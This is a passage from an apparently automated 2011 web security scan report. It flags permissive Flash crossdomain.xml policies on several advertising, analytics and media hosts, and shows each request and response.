Severity:   High
Confidence:   Certain
Host:   http://pg.links.origin.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2884"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:38 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.49. http://ping.crowdscience.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Wed, 27 Apr 2011 03:48:25 GMT
ETag: "c3167-e0-4a1de5011d440"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

4.50. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.51. http://pixel.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.52. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:45 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051143-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=999077
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.53. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.54. http://pixel.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.55. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.56. http://pro.cnbc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pro.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 C aicache6
Content-Length: 203
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:03:20 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.57. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv03.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rcv-srv03.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313337982000"
Last-Modified: Sun, 14 Aug 2011 16:06:22 GMT
host: rcv-srv03
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.60. http://reviews.gillettevenus.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://reviews.gillettevenus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.61. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:18:10 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 56400
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.62. http://search.twitter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:42:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.63. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.64. http://services.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: services.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15552000
Content-Length: 682
Content-Type: text/xml
Content-Location: http://services.plymedia.com/crossdomain.xml
Last-Modified: Sun, 12 Oct 2008 12:01:36 GMT
Accept-Ranges: bytes
ETag: "d4bdbe46622cc91:69f"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 16:12:57 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.65. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.66. http://static.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: p2kfOzDCng+L76/JTsga//ruR9goW2HSjGFLQ4hzapeI1gDCQ+kmiJpTbuF2/Np4
x-amz-request-id: E50262CF927C8E0A
Date: Tue, 12 Jul 2011 23:33:42 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3
Age: 2242
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 123b0430d85da58b68cb675acbdd06c268df8e8fd9fca78a071b7f61da95f240a1e6cf1947de972d
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 146c5c89c7c8fdf6aead7052bd267a9d.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.plymedia.com.s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.plymedia.com.s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: Pd0L2ovjrp/ISSNethDM0f3pSYm1BIX6qTq2TTDXHH+SL+bp1gPlnN6PYv/OGA5v
x-amz-request-id: C468540F9D630C4D
Date: Tue, 06 Sep 2011 16:13:11 GMT
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 13 May 2009 15:23:00 GMT
ETag: "60a8f758689bdda4e7f5930695eaaee5"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 682
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.68. http://stats.deloitte.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:01 GMT
Server: Omniture DC/2.0.0
xserver: www88
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.69. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.70. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 14:56:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "32883cc-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.71. http://tf.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tf.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ttwbs.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:39 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 441
content-type: application/xml
Age: 61
Via: 1.1 iad061108 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.73. http://wingateweb.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wingateweb.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:54 GMT
Server: Omniture DC/2.0.0
xserver: www125
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.74. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:05:46 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "447038-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.75. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
